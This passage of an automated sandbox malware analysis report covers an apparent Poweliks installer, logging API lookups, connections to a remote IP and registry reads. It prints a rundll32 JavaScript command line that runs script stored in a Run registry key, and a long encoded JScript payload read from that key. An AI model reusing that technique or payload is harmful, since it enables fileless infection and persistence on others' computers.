Get Address c:\windows\syswow64\kernel32.dll function = OpenEventA, address_out = 0x765c4a45 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x765c14b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x765c10ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x765c7a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x765c110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x765c3519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x765c1245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x765c186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x765c1856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x765c11c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x765c1222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x765c89b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x765c1410 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = strstr, address_out = 0x775dc780 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = atoi, address_out = 0x775ad2f3 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwSetValueKey, address_out = 0x775801b4 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _snwprintf, address_out = 0x77592417 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _itoa, address_out = 0x775ad2c6 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = strncat, address_out = 0x775dc570 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = strncpy, address_out = 0x775d5c30 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = sscanf, address_out = 0x776354a7 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlRandom, address_out = 0x776298c3 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _snprintf, address_out = 0x77634760 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _vsnprintf, address_out = 0x775d9d88 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = memset, address_out = 0x7758df20 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlAdjustPrivilege, address_out = 0x77611f40 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwCreateKey, address_out = 0x7757fb30 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _chkstk, address_out = 0x7759ad68 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 3, address_out = 0x75383918 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 19, address_out = 0x75386f01 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 4, address_out = 0x75386bdd True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75397673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 23, address_out = 0x75383eb8 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 115, address_out = 0x75383ab2 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 16, address_out = 0x75386b0e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7713ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7711bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x771181ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrIA, address_out = 0x7710d250 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = SHGetValueA, address_out = 0x7710cf09 True 1
Fn
Get Address c:\windows\syswow64\urlmon.dll function = URLDownloadToCacheFileW, address_out = 0x764ae4a0 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreateSequential, address_out = 0x753e7c12 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCrackUrlA, address_out = 0x76bed075 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenProcessToken, address_out = 0x76774304 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetKeySecurity, address_out = 0x7676b2d4 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x7677469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetSidSubAuthority, address_out = 0x76770e24 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetSidSubAuthorityCount, address_out = 0x76770e0c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExA, address_out = 0x76771469 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x767714d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegFlushKey, address_out = 0x7678773f True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetTokenInformation, address_out = 0x7677431c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExA, address_out = 0x76774907 True 2
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x757b1e46 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleInitialize, address_out = 0x7558efd7 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x755b9d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x763e3e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x763e4642 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x765c195e True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x775c848f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Wow64DisableWow64FsRedirection, address_out = 0x765dd650 True 1
Fn
COM (1)
+
Operation Additional Information Success Count Logfile
Create interface = AADC65F6-CFF1-11D1-B747-00C04FC2B085, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System (7)
+
Operation Additional Information Success Count Logfile
Get Info type = System Directory, result_out = C:\Windows\system32 True 2
Fn
Get Info type = Operating System False 3
Fn
Get Info type = Operating System True 2
Fn
Network Behavior
DNS (2)
+
Operation Additional Information Success Count Logfile
Resolve Name host = 178.89.159.34, address_out = 178.89.159.34 True 2
Fn
TCP Sessions (1)
+
Information Value
Total Data Sent 0.00 KB (0 bytes)
Total Data Received 0.00 KB (0 bytes)
Contacted Host Count 1
Contacted Hosts 178.89.159.34:80
TCP Session #1
+
Information Value
Handle 0x1a4
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 178.89.159.34
Remote Port 80
Local Address
Local Port
Data Sent 0.00 KB (0 bytes)
Data Received 0.00 KB (0 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 178.89.159.34, remote_port = 80 False 1
Fn
Close type = SOCK_STREAM True 1
Fn
TCP Session #2
+
Information Value
Handle 0x260
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 178.89.159.34
Remote Port 80
Local Address
Local Port
Data Sent 0.00 KB (0 bytes)
Data Received 0.00 KB (0 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 178.89.159.34, remote_port = 80 False 1
Fn
Process #2: rundll32.exe
(Host: 32, Network: 0)
+
Information Value
ID #2
File Name c:\windows\system32\rundll32.exe
Command Line rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:36, Reason: Child Process
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:01:36
OS Process Information
+
Information Value
PID 0xa3c
Parent PID 0xa00 (c:\users\5p5nrgjn0js halpmcxz\desktop\poweliks_installer.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010611 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A40
0x A44
0x A48
0x A4C
0x A50
0x A54
0x A60
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
  • Region Actions
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x00000000000c0000 0x000c0000 0x000c1fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True True False
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True True False
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000100000 0x00100000 0x00100fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000110000 0x00110000 0x0018ffff Private Memory Readable, Writable True True False
private_0x0000000000190000 0x00190000 0x0028ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000002b0000 0x002b0000 0x002b1fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000002c0000 0x002c0000 0x002cffff Private Memory Readable, Writable True True False
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000002e0000 0x002e0000 0x0031ffff Private Memory Readable, Writable True True False
msctf.dll.mui 0x00320000 0x00320fff Memory Mapped File Readable, Writable False False False
  • Region Actions
private_0x0000000000330000 0x00330000 0x0042ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000430000 0x00430000 0x005b7fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000005c0000 0x005c0000 0x00740fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000750000 0x00750000 0x01b4ffff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000001b50000 0x01b50000 0x01e92fff Pagefile Backed Memory Readable True False False
  • Region Actions
oleaccrc.dll 0x01ea0000 0x01ea0fff Memory Mapped File Readable False False False
  • Region Actions
wshom.ocx 0x01eb0000 0x01ec3fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000001ed0000 0x01ed0000 0x01f4ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001f50000 0x01f50000 0x01f51fff Pagefile Backed Memory Readable True False False
  • Region Actions
scrrun.dll 0x01f60000 0x01f6ffff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000001f70000 0x01f70000 0x01feffff Private Memory Readable, Writable True True False
pagefile_0x0000000001ff0000 0x01ff0000 0x01ff0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000002000000 0x02000000 0x02001fff Pagefile Backed Memory Readable True False False
  • Region Actions
cversions.1.db 0x02010000 0x02013fff Memory Mapped File Readable True False False
  • Region Actions
cversions.2.db 0x02010000 0x02013fff Memory Mapped File Readable True False False
  • Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x02020000 0x0204ffff Memory Mapped File Readable True False False
  • Region Actions
private_0x0000000002050000 0x02050000 0x020cffff Private Memory Readable, Writable True True False
pagefile_0x00000000020d0000 0x020d0000 0x020d0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db 0x020e0000 0x0210ffff Memory Mapped File Readable True False False
  • Region Actions
cversions.2.db 0x02110000 0x02113fff Memory Mapped File Readable True False False
  • Region Actions
private_0x0000000002140000 0x02140000 0x021bffff Private Memory Readable, Writable True True False
pagefile_0x00000000021c0000 0x021c0000 0x0229efff Pagefile Backed Memory Readable True False False
  • Region Actions
sortdefault.nls 0x022a0000 0x0256efff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000002590000 0x02590000 0x0260ffff Private Memory Readable, Writable True True False
private_0x0000000002610000 0x02610000 0x0270ffff Private Memory Readable, Writable True True False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x02710000 0x02775fff Memory Mapped File Readable True False False
  • Region Actions
private_0x00000000027d0000 0x027d0000 0x0284ffff Private Memory Readable, Writable True True False
private_0x0000000002850000 0x02850000 0x028cffff Private Memory Readable, Writable True True False
pagefile_0x00000000028d0000 0x028d0000 0x02cc2fff Pagefile Backed Memory Readable True False False
  • Region Actions
ieframe.dll 0x02cd0000 0x03886fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x0000000003890000 0x03890000 0x0398ffff Private Memory Readable, Writable True True False
private_0x0000000003990000 0x03990000 0x03a90fff Private Memory Readable, Writable True True False
private_0x0000000003a10000 0x03a10000 0x03a8ffff Private Memory Readable, Writable True True False
user32.dll 0x77160000 0x77259fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x77260000 0x7737efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77380000 0x77528fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
psapi.dll 0x77540000 0x77546fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff4000 0x7fff4000 0x7fff4fff Private Memory Readable, Writable True True False
rundll32.exe 0xff240000 0xff24efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mshtml.dll 0x7fef2d10000 0x7fef35a7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
jscript.dll 0x7fef3bc0000 0x7fef3ca2fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
scrrun.dll 0x7fef3e70000 0x7fef3ea3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wshom.ocx 0x7fef42a0000 0x7fef42c7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
oleacc.dll 0x7fef46d0000 0x7fef4723fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ieframe.dll 0x7fef4730000 0x7fef52e6fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msimtf.dll 0x7fef5ab0000 0x7fef5abdfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msls31.dll 0x7fef6a80000 0x7fef6abafff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mpr.dll 0x7fefa550000 0x7fefa567fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntmarta.dll 0x7fefb4a0000 0x7fefb4ccfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dwmapi.dll 0x7fefb7f0000 0x7fefb807fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
uxtheme.dll 0x7fefbc20000 0x7fefbc75fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
propsys.dll 0x7fefbc80000 0x7fefbdabfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
comctl32.dll 0x7fefbe00000 0x7fefbff3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
version.dll 0x7fefc490000 0x7fefc49bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rsaenh.dll 0x7fefc8c0000 0x7fefc906fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptsp.dll 0x7fefcbc0000 0x7fefcbd6fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x7fefd190000 0x7fefd1b4fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x7fefd1c0000 0x7fefd1cefff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sxs.dll 0x7fefd1d0000 0x7fefd260fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrtremote.dll 0x7fefd2b0000 0x7fefd2c3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
profapi.dll 0x7fefd2d0000 0x7fefd2defff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msasn1.dll 0x7fefd370000 0x7fefd37efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cfgmgr32.dll 0x7fefd380000 0x7fefd3b5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
devobj.dll 0x7fefd3c0000 0x7fefd3d9fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
crypt32.dll 0x7fefd420000 0x7fefd586fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x7fefd630000 0x7fefd69afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imagehlp.dll 0x7fefd6f0000 0x7fefd706fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x7fefd710000 0x7fefd776fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shell32.dll 0x7fefd780000 0x7fefe507fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
setupapi.dll 0x7fefe510000 0x7fefe6e6fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
clbcatq.dll 0x7fefe6f0000 0x7fefe788fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ole32.dll 0x7fefe830000 0x7fefea32fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x7fefea40000 0x7fefea6dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iertutil.dll 0x7fefea70000 0x7fefecc8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x7fefecd0000 0x7fefedd8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
oleaut32.dll 0x7fefede0000 0x7fefeeb6fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wldap32.dll 0x7fefeed0000 0x7fefef21fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
advapi32.dll 0x7fefef30000 0x7feff00afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
urlmon.dll 0x7feff010000 0x7feff187fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x7feff190000 0x7feff2bcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x7feff2c0000 0x7feff35efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wininet.dll 0x7feff360000 0x7feff489fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
lpk.dll 0x7feff490000 0x7feff49dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
usp10.dll 0x7feff520000 0x7feff5e8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x7feff5f0000 0x7feff60efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shlwapi.dll 0x7feff610000 0x7feff680fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
apisetschema.dll 0x7feff6a0000 0x7feff6a0fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x000007fffffac000 0x7fffffac000 0x7fffffadfff Private Memory Readable, Writable True True False
private_0x000007fffffae000 0x7fffffae000 0x7fffffaffff Private Memory Readable, Writable True True False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000007fffffd4000 0x7fffffd4000 0x7fffffd5fff Private Memory Readable, Writable True True False
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd7fff Private Memory Readable, Writable True True False
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd9fff Private Memory Readable, Writable True True False
private_0x000007fffffda000 0x7fffffda000 0x7fffffdbfff Private Memory Readable, Writable True True False
private_0x000007fffffdc000 0x7fffffdc000 0x7fffffdcfff Private Memory Readable, Writable True True False
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True True False
Host Behavior
Registry (4)
+
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKCU\software\microsoft\windows\currentversion\run\ data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 